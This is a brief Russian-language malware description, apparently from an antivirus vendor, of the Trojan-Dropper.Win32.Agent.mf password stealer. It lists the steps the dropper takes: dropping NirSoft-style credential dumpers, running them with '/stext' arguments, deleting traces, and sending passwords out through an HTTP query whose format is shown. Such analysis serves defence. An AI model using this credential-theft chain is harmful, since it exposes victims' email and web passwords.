07.01.2007
Trojan-Dropper.Win32.Agent.mf
Размер – 121 кб, в теле исполняемого файла в незашифрованном виде хранится несколько других исполняемых файлов. В случае запуска скрытно выполняет следующие операции:
1. В текущем каталоге создает ряд исполняемых файлов с именами pwha.exe, astr.exe, im.exe
2. Запускает im.exe с параметрами “im.exe /stext im.txt”
3. Запускает pwha.exe с параметрами "pwha.exe /stext pww.txt"
4. Запускает astr.exe без параметров
5. Анализирует файлы pww.txt и im.txt. Пример файла pww.txt:
==================================================
Resource Name : myserver.com
Resource Type : Outlook Express
User Name/Value : mylogin
Password : topsecretpwd
==================================================
==================================================
Resource Name : IdentitiesPass
Resource Type : Outlook Express Identity
User Name/Value : Основное удостоверение
Password :
==================================================
6. Уничтожает все созданные EXE файлы и текстовые файлы pww.txt и im.txt, созданные в процессе их работы, после чего завершает работу.
7. Передает найденные пароли создателям, пример передачи паролей имеет вид: <URL>/a.php?&R=myserver.com&L=mylogin&P=topsecretpwd&TY=IE. Передача паролей происходит только в случае обнаружения хотя-бы одного пароля.
Программы im.exe и pwha.exe являются утилитами для поиска паролей, pwha.exe извлекает сохраненные для WEB страниц данные автозаполнения форм и пароли, а также пароли для аккаунтов электронной почты Outlook Express. im.exe осуществляет поиск паролей Yahoo Messenger, Trillian и т.п (см. описание утилит на http://www.nirsoft.net/). astr.exe - это граббер паролей, вводимых в полях с заменой паролей на "*"